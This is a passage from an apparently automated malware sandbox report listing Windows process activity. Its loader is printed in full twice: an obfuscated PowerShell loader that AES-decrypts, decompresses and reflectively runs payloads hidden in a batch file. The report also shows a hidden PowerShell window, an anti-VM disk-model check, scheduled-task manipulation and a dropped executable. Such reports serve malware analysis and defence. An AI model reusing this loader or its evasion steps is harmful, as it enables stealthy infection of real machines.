Commandline:cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Users\user\Desktop\x.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:07:39:59
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:07:40:00
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:07:40:08
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\dllhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{6e38c76f-48eb-487e-9cfd-6176ccb652b5}
                                                        Imagebase:0x7ff70f330000
                                                        File size:21'312 bytes
                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:07:40:08
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\winlogon.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:winlogon.exe
                                                        Imagebase:0x7ff7cd660000
                                                        File size:906'240 bytes
                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Target ID:10
                                                        Start time:07:40:08
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\lsass.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\lsass.exe
                                                        Imagebase:0x7ff7a2ae0000
                                                        File size:59'456 bytes
                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:11
                                                        Start time:07:40:09
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:07:40:09
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\x.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:07:40:09
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:07:40:10
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\dwm.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"dwm.exe"
                                                        Imagebase:0x7ff74e710000
                                                        File size:94'720 bytes
                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:15
                                                        Start time:07:40:12
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:16
                                                        Start time:07:40:12
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:17
                                                        Start time:07:40:12
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:wmic diskdrive get Model
                                                        Imagebase:0x7ff640220000
                                                        File size:576'000 bytes
                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:07:40:12
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\findstr.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                                        Imagebase:0x7ff6903c0000
                                                        File size:36'352 bytes
                                                        MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:20
                                                        Start time:07:40:16
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:21
                                                        Start time:07:40:16
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:22
                                                        Start time:07:40:16
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:23
                                                        Start time:07:40:16
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:24
                                                        Start time:07:40:17
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:25
                                                        Start time:07:40:19
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:26
                                                        Start time:07:40:19
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:27
                                                        Start time:07:40:20
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd.exe /c echo function aQLUy($yReKm){ $FiuGL=[System.Security.Cryptography.Aes]::Create(); $FiuGL.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FiuGL.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FiuGL.Key=[System.Convert]::FromBase64String('Yeb/NAcCgrTp64tTdeVgDdugi9XnGFjFK2NDoLygP24='); $FiuGL.IV=[System.Convert]::FromBase64String('lhLiL9MPOAHIRlkYn9z7VA=='); $exYAh=$FiuGL.CreateDecryptor(); $YgVOo=$exYAh.TransformFinalBlock($yReKm, 0, $yReKm.Length); $exYAh.Dispose(); $FiuGL.Dispose(); $YgVOo;}function mFHoz($yReKm){ Invoke-Expression '$HdeTZ=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$yReKm);'.Replace('*', ''); Invoke-Expression '$wKYjD=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$odkuT=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($HdeTZ, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $odkuT.CopyTo($wKYjD); $odkuT.Dispose(); $HdeTZ.Dispose(); $wKYjD.Dispose(); $wKYjD.ToArray();}function tnqry($yReKm,$VDCUY){ Invoke-Expression '$KyIng=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$yReKm);'.Replace('*', ''); Invoke-Expression '$TcvQt=$KyIng.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$TcvQt.*I*n*v*o*k*e*($null, $VDCUY);'.Replace('*', '');}$yFDGP = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $yFDGP;$blPNL=[System.IO.File]::ReadAllText($yFDGP).Split([Environment]::NewLine);foreach ($nqZfK in $blPNL) { if ($nqZfK.StartsWith('tdfVh')) { $ZaBDo=$nqZfK.Substring(5); break; }}$ouiFf=[string[]]$ZaBDo.Split('\');Invoke-Expression '$pcr = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$aZk = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$fEm = mFHoz (aQLUy ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($ouiFf[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');tnqry $pcr $null;tnqry $aZk $null;tnqry $fEm (,[string[]] (''));
                                                        Imagebase:0x7ff6a4070000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:07:40:20
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:29
                                                        Start time:07:40:22
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:30
                                                        Start time:07:40:22
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:31
                                                        Start time:07:40:22
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:32
                                                        Start time:07:40:23
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:33
                                                        Start time:07:40:23
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:34
                                                        Start time:07:40:23
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:35
                                                        Start time:07:40:24
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:36
                                                        Start time:07:40:24
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:37
                                                        Start time:07:40:24
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:38
                                                        Start time:07:40:24
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:39
                                                        Start time:07:40:25
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:40
                                                        Start time:07:40:26
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:41
                                                        Start time:07:40:26
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:42
                                                        Start time:07:40:27
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:43
                                                        Start time:07:40:27
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:44
                                                        Start time:07:40:27
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\dllhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\dllhost.exe /Processid:{5004adc4-d516-4ec2-8626-9598e9dad3bc}
                                                        Imagebase:0x7ff70f330000
                                                        File size:21'312 bytes
                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:07:40:28
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:46
                                                        Start time:07:40:28
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\spoolsv.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\spoolsv.exe
                                                        Imagebase:0x7ff646ff0000
                                                        File size:842'752 bytes
                                                        MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:47
                                                        Start time:07:40:28
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                        Imagebase:0x7ff70f330000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:48
                                                        Start time:07:40:28
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:49
                                                        Start time:07:40:30
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:50
                                                        Start time:07:40:32
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\System32\svchost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                        Imagebase:0x7ff6eef20000
                                                        File size:55'320 bytes
                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:false

                                                        Target ID:51
                                                        Start time:07:40:33
                                                        Start date:13/12/2024
                                                        Path:C:\Windows\$nya-onimai2\IfMUlU.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\$nya-onimai2\IfMUlU.exe"
                                                        Imagebase:0x246b5010000
                                                        File size:36'864 bytes
                                                        MD5 hash:B943A57BDF1BBD9C33AB0D33FF885983
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 5%, ReversingLabs
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:44.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:72.9%
                                                          Total number of Nodes:251
                                                          Total number of Limit Nodes:30
